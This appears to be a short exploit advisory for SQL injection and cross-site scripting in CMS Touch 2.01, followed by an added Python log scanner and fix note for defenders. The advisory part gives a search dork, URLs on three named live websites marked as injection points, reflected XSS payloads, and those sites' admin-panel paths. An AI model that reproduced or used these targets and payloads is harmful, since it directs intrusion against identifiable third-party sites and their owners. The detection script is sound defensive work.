CMS Touch version 2.01 suffers from remote SQL injection and cross-site scripting vulnerabilities. Note that this finding houses site-specific data.
c655b6f45eb784269e8b7fa2be84b760ebc6980d5e6c56eeba90e163b5294d09
CMS Touch V2.01 SQL Vulnerability
=================================
Author : indoushka
vendor : http://cmstouch.com
=================================
# Dork : powered by cmstouch
Touch website management system, version 2.01
http://alfarrajsite.com/cmstouch/pages.php?Page_ID=28 (inject here)
http://www.islamiccenter1.com/cmstouch/news.php?do=show&News_ID=18 (inject here)
http://www.ts.net.sa/cmstouch/news.php?do=show&News_ID=18 (inject here)
XSS:
/cmstouch/news.php?do=show&News_ID=18'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>
/cmstouch/products.php?do=show&Products_ID=5'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>
Panel:
http://www.ts.net.sa/cmstouch//touchPanel/
http://cmstouch.com/touchPanel/
http://islamiccenter1.com/cmstouch/touchPanel/
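
For operators of a CMS Touch install, one way to spot probing of the ID parameters named above is to flag any request where `Page_ID`, `News_ID` or `Products_ID` is not a plain integer. This is an added example, not part of the original advisory or the vendor's code; it assumes a combined-format access log, and the log lines and the function names `suspicious_id` and `scan` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and ID parameters named in the advisory.
ID_PARAMS = {"pages.php": "Page_ID", "news.php": "News_ID",
             "products.php": "Products_ID"}

# Request portion of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cmstouch/news.php?do=show&News_ID=18 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /cmstouch/news.php?do=show&News_ID=18%27 HTTP/1.1" 200 312',
    '192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] "GET /cmstouch/products.php?do=show&Products_ID=5%22%3Cb%3E HTTP/1.1" 200 298',
    '192.0.2.12 - - [01/Jan/2024:10:01:00 +0000] "GET /cmstouch/pages.php?Page_ID=28 HTTP/1.1" 200 4096',
]

def suspicious_id(line):
    """Return (script, param, decoded value) if the ID is not a plain integer."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    param = ID_PARAMS.get(script)
    if param is None:
        return None
    # parse_qsl percent-decodes values, so encoded quotes and tags are seen as-is.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == param and not re.fullmatch(r"[0-9]{1,10}", value):
            return (script, param, value)
    return None

def scan(lines):
    """Collect every flagged request from an iterable of log lines."""
    return [hit for hit in map(suspicious_id, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule applied server-side, before the value reaches a query or the page output, addresses both the SQL injection and the reflected XSS on these parameters.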